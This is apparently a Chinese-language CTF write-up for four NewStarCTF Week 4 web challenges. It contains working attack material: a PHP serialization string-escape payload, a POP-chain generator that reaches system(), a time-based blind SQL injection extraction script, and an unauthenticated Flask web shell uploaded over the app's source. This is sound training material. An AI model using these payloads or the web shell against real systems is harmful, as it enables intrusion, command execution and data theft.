NewStarCTF-Week4-Web

查看源码

<?php
// White-box challenge: the page echoes its own source to every visitor.
highlight_file(__FILE__);
/**
 * "WAF" applied to the serialized blob: rewrites every occurrence of "bad" to "good".
 *
 * Security note: the replacement is one byte longer than the match, while the
 * s:N:"..." length prefix that serialize() already wrote is left untouched.
 * Any caller-controlled "bad" therefore pushes bytes past the end of the
 * string field, which is exactly what the unserialize() call below consumes.
 *
 * @param string $str serialized data
 * @return string the rewritten data (length grows by one per match)
 */
function waf($str){
    return strtr($str, ["bad" => "good"]);
}

class GetFlag {
    // Filled from $_GET['key'] by the constructor call below; serialized first.
    public $key;
    // Serialized second. Only the default runs unless a payload smuggles in a
    // replacement "cmd" property after the key (see the writeup's payload).
    public $cmd = "whoami";
    public function __construct($key)
    {
        $this->key = $key;
    }
    // Dangerous sink: every GetFlag instance, including one rebuilt by
    // unserialize(), passes $cmd to the shell when it is destroyed. Property
    // order and names above are what the serialized layout is built from;
    // changing them changes the bytes any exploit has to match.
    public function __destruct()
    {
        system($this->cmd);
    }
}

// Vulnerable flow: the user value is serialized with a correct s:N: length
// prefix, waf() then grows the content without fixing that prefix, and the
// result goes straight back into unserialize(). NOTE: unserialize() on data
// shaped by untrusted input is the root cause; the WAF only makes it reachable.
$blob = serialize(new GetFlag($_GET['key']));
$filtered = waf($blob);
unserialize($filtered);

初步判断是字符串增多逃逸：waf() 把 3 字节的 bad 替换成 4 字节的 good，每次多出 1 字节，但 serialize() 已经写好的 s:N: 长度前缀不会随之更新，多出来的字节会被 unserialize() 当作后续的属性继续解析。要注入的后缀 `";s:3:"cmd";s:9:"cat /flag";}` 共 29 字节，所以 key 里需要放 29 个 bad。

payload

1
?key=badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:9:"cat /flag";}

image-20231030222625673

More Fast

查看源码

<?php
// White-box challenge: the page echoes its own source to every visitor.
highlight_file(__FILE__);

/**
 * Head of the gadget chain. die()/exit() prints its argument as a string, so
 * when $errMsg holds an object that object's __toString() runs at destruction
 * time (the writeup stores a Crypto here).
 */
class Start{
    public $errMsg;
    public function __destruct() {
        exit($this->errMsg);
    }
}

/**
 * Invokable link: calling a Pwn as a function forwards to $obj->evil().
 * Its own evil() only calls phpinfo(); the exploit points $obj at a Web
 * instead, whose evil() is the real sink.
 */
class Pwn{
    public $obj;
    public function __invoke(){
        $target = $this->obj;
        $target->evil();
    }
    public function evil() {
        phpinfo();
    }
}

/**
 * Reading any inaccessible property of a Reverse calls $func with no
 * arguments. With a Pwn stored in $func this lands in Pwn::__invoke.
 */
class Reverse{
    public $func;
    public function __get($var) {
        $callback = $this->func;
        $callback();
    }
}

/**
 * Final sink: evil() calls $func($var), e.g. system('ls /'). The only guard
 * is a case-insensitive substring check for "flag" on $var; the callable in
 * $func is not restricted at all, so any command line that avoids that
 * substring is executed.
 */
class Web{
    public $func;
    public $var;
    public function evil() {
        if (preg_match("/flag/i", $this->var)) {
            echo "Not Flag";
            return;
        }
        ($this->func)($this->var);
    }
}

/**
 * String conversion reads $obj->good and discards the value. When $obj has no
 * accessible "good" property that read fires its __get(), which is how the
 * chain reaches Reverse. The returned text is constant.
 */
class Crypto{
    public $obj;
    public function __toString() {
        $trigger = $this->obj->good;
        return "NewStar";
    }
}

/**
 * Decoy: exposes an evil() like Pwn and Web, but it only prints a message.
 */
class Misc{
    public function evil() {
        print("good job but nothing");
    }
}

// The POST body is unserialized, then the request ends with an uncaught
// exception; as the writeup notes, that keeps the normal end-of-script
// __destruct of $a from firing. The writeup works around it by truncating the
// payload so unserialize() fails part way: the partially built Start is
// released right there and its __destruct runs before the throw is reached.
// The @ only hides the notice that failed unserialize() would emit.
$a = @unserialize($_POST['fast']);
throw new Exception("Nope");

一眼反序列化，POP 链为：Start::__destruct → die($errMsg) 触发 Crypto::__toString → 读取 $this->obj->good 触发 Reverse::__get → ($this->func)() 触发 Pwn::__invoke → $this->obj->evil() 进入 Web::evil → system('ls /')。直接上 payload。

<?php
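/**
 * Stub of the target's Start class, used only to serialize() the chain.
 *
 * The original copy kept __destruct() with die($this->errMsg). When the
 * generator finished, that ran with errMsg holding a Crypto that has no
 * __toString() in this script, ending the run with a "could not be converted
 * to string" Error after the payload had already been printed. Serialization
 * never needs the method, so it is dropped. The property name and order must
 * still match the target: "errMsg" is the only property.
 */
class Start{
    public $errMsg;
}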

// Stub of the target's Pwn: only the "obj" property matters for serialize().
class Pwn{
    public $obj;
}

// Stub of the target's Reverse: only the "func" property matters for serialize().
class Reverse{
    public $func;
}

// Stub of the target's Web. Declaration order ("func" before "var") is the
// order serialize() emits, so it must match the target class.
class Web{
    public $func;
    public $var;
}

// Stub of the target's Crypto: only the "obj" property matters for serialize().
class Crypto{
    public $obj;
}

// Stub of the target's Misc; not part of the chain, kept so the class set
// mirrors the target.
class Misc{
}
// Assemble the POP chain. On the target it unwinds as:
//   Start::__destruct -> die($errMsg) -> Crypto::__toString
//     -> $obj->good -> Reverse::__get -> ($func)() -> Pwn::__invoke
//       -> $obj->evil() -> Web::evil -> system('ls /')
// Only the innermost link carries attacker data. Web::evil rejects any $var
// containing "flag" (case-insensitive), which is why the command is 'ls /'.
$start = new Start();
$crypto = new Crypto();
$reverse = new Reverse();
$pwn = new Pwn();
$web = new Web();

$web->func = 'system';
$web->var = 'ls /';
$pwn->obj = $web;
$reverse->func = $pwn;
$crypto->obj = $reverse;
$start->errMsg = $crypto;

// The writeup drops the final "}" from this output so the target's
// unserialize() fails early and fires __destruct before its throw.
echo serialize($start);

得到

1
O:5:"Start":1:{s:6:"errMsg";O:6:"Crypto":1:{s:3:"obj";O:7:"Reverse":1:{s:4:"func";O:3:"Pwn":1:{s:3:"obj";O:3:"Web":2:{s:4:"func";s:6:"system";s:3:"var";s:4:"ls /";}}}}}

因为 unserialize 之后紧接着 throw 了一个未捕获的异常，正常流程下 Start 的 __destruct 不会再被触发，所以要提前触发 destruct：去掉最后一个大括号让序列化串不完整，unserialize 解析到末尾失败时会立即释放已经构造好的 Start 对象，__destruct 就在 throw 之前执行了。

1
O:5:"Start":1:{s:6:"errMsg";O:6:"Crypto":1:{s:3:"obj";O:7:"Reverse":1:{s:4:"func";O:3:"Pwn":1:{s:3:"obj";O:3:"Web":2:{s:4:"func";s:6:"system";s:3:"var";s:4:"ls /";}}}}

image-20231030224758834

最后的结果

image-20231030225936688

midsql

经过一系列的测试，最后发现可以用时间盲注：用 if(条件, sleep(2), sleep(0)) 把查询结果映射成响应时延来逐字符判断；payload 中的空格全部用 /**/ 代替，推测是空格被过滤了。

payload

1
?id=1/**/and/**/if(ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()/**/limit/**/0,1),1,1))>100,sleep(2),sleep(0))

然后就是写脚本进行爆破了

import requests
import time
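# Target instance; every probe is a GET against this base URL.
BASE_URL = 'http://0eda0b68-7d6f-42ae-afa3-b6cf506a0cea.node4.buuoj.cn:81/'

# Time-based blind oracle templates. Placeholders, in order: row offset for
# LIMIT, character position (1-based, as substr() counts), candidate ASCII
# code. 'eq' asks whether the code equals the candidate, 'gt' whether it is
# strictly greater. Spaces are written as /**/ throughout; presumably the
# target filters whitespace (not verifiable from this script).
TEMPLATES = {
    'eq': BASE_URL + '?id=1/**/and/**/if(ascii(substr((select/**/name/**/from/**/items/**/limit/**/{},1),{},1))/**/like/**/{},sleep(2),sleep(0))',
    'gt': BASE_URL + '?id=1/**/and/**/if(ascii(substr((select/**/name/**/from/**/items/**/limit/**/{},1),{},1))/**/>/**/{},sleep(2),sleep(0))',
}

SLEEP_SECONDS = 2        # must match sleep(2) in the templates
LOW, HIGH = 32, 128      # printable ASCII search window [LOW, HIGH)
ROWS = 10                # number of rows to dump
MAX_LEN = 49             # longest value considered per row
REQUEST_TIMEOUT = 30     # seconds; far above SLEEP_SECONDS so a hang is an error, not a hit


def http_probe(kind, row, pos, value):
    """Send one oracle request and report whether the injected sleep fired.

    Returns True when the round trip took longer than SLEEP_SECONDS, i.e. the
    if() condition in the template evaluated true on the server. A slow but
    non-sleeping response is indistinguishable from a hit, so compare
    SLEEP_SECONDS against the target's baseline latency before trusting the
    output. A request that exceeds REQUEST_TIMEOUT raises
    requests.exceptions.Timeout instead of being misread as a hit.
    """
    url = TEMPLATES[kind].format(row, pos, value)
    started = time.time()
    requests.get(url, timeout=REQUEST_TIMEOUT)
    return time.time() - started > SLEEP_SECONDS


def find_char(row, pos, probe=http_probe):
    """Binary-search the character at 1-based position `pos` of row `row`.

    `probe(kind, row, pos, value)` answers the 'eq'/'gt' questions.
    Returns the character, or '' when no code in [LOW, HIGH) matches, which
    is what happens past the end of the value (ascii('') is 0) or when the
    row does not exist (comparisons against NULL are never true).
    """
    low, high = LOW, HIGH
    while low < high:
        mid = (low + high) // 2
        if probe('eq', row, pos, mid):
            return chr(mid)
        if probe('gt', row, pos, mid):
            low = mid + 1    # 'eq' already failed, so the code is > mid
        else:
            high = mid
    return ''


def dump(rows=ROWS, max_len=MAX_LEN, probe=http_probe, verbose=True):
    """Extract up to `max_len` characters of each of the first `rows` rows.

    Rows are separated by one space in the returned string; the separator is
    appended after every row, including empty ones, as in the original
    script. With `verbose` the partial result is printed after each recovered
    character so progress is visible during a slow extraction.
    """
    text = ''
    for row in range(rows):
        for pos in range(1, max_len + 1):
            if verbose:
                print('j=', pos)
            ch = find_char(row, pos, probe)
            if not ch:
                break
            text += ch
            if verbose:
                print(text)
        text += ' '
    return text


if __name__ == '__main__':
    print(dump())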


#http://0eda0b68-7d6f-42ae-afa3-b6cf506a0cea.node4.buuoj.cn:81/?id=1/**/and/**/if(ascii(substr((select/**/schema_name/**/from/**/information_schema.schemata/**/limit/**/{},1),{},1))/**/like/**/{},sleep(2),sleep(0))  爆所有库名 (enumerate database names)
#http://0eda0b68-7d6f-42ae-afa3-b6cf506a0cea.node4.buuoj.cn:81/?id=1/**/and/**/if(ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'ctf'/**/limit/**/{},1),{},1))/**/like/**/{},sleep(2),sleep(0))  爆表名 (enumerate tables in ctf)
#http://0eda0b68-7d6f-42ae-afa3-b6cf506a0cea.node4.buuoj.cn:81/?id=1/**/and/**/if(ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/"items"/**/limit/**/{},1),{},1))/**/like/**/{},sleep(2),sleep(0))  爆字段 (enumerate columns of items)
#http://0eda0b68-7d6f-42ae-afa3-b6cf506a0cea.node4.buuoj.cn:81/?id=1/**/and/**/if(ascii(substr((select/**/name/**/from/**/items/**/limit/**/{},1),{},1))/**/>/**/{},sleep(2),sleep(0))  爆字段值 (dump the name column)

image-20231031135107170

爆破成功

flask disk

题目提示:a flask disk with a vulneribility. (The application is running on port 5000)

打开环境发现flask开启了debug模式,并且我们能够上传文件

考点：flask 在开启 debug 模式时会启动自动重载器，监视源文件的变化；通过上传功能覆盖 app.py 后，新文件会被立即重新加载执行，于是任意文件上传升级成了 RCE。

写一个带命令执行接口的 app.py（保持监听 0.0.0.0:5000 并开启 debug，与题目提示一致），然后上传覆盖原文件

import os
import subprocess

from flask import Flask, request

app = Flask(__name__)  # replacement app.py: it becomes the challenge's app once the debug reloader picks it up (per the writeup)

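@app.route('/')
def index():
    """Web-shell endpoint: run the shell command passed as ?cmd= and return its output.

    Returns the literal "1" when no cmd is supplied (the original's fallback),
    otherwise the command's stdout and stderr merged, so a failing command is
    visible instead of producing an empty page. A command running longer than
    the timeout is killed and reported. The original wrapped everything in a
    bare ``except: pass`` that hid every error behind "1"; only the timeout is
    caught now, anything else surfaces in Flask's debug page.

    This is deliberately unauthenticated remote code execution for the CTF
    target; never deploy it anywhere else.
    """
    cmd = request.args.get('cmd')
    if not cmd:
        return "1"
    try:
        completed = subprocess.run(
            cmd,
            shell=True,                   # the operator supplies a full shell command line on purpose
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,     # merge stderr so errors are not silently lost
            universal_newlines=True,
            timeout=60,                   # seconds; killing the shell may leave grandchildren running
        )
    except subprocess.TimeoutExpired:
        return "command timed out after 60 s"
    return completed.stdout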

if __name__ == '__main__':
    # Match the hint ("running on port 5000"); debug=True is kept because the
    # writeup relies on debug mode's auto-reload to load this replaced file.
    # Binding to 0.0.0.0 exposes the shell to anyone who can reach the port.
    app.run(host='0.0.0.0',port=5000,debug=True)

image-20231031181331502

image-20231031181344460

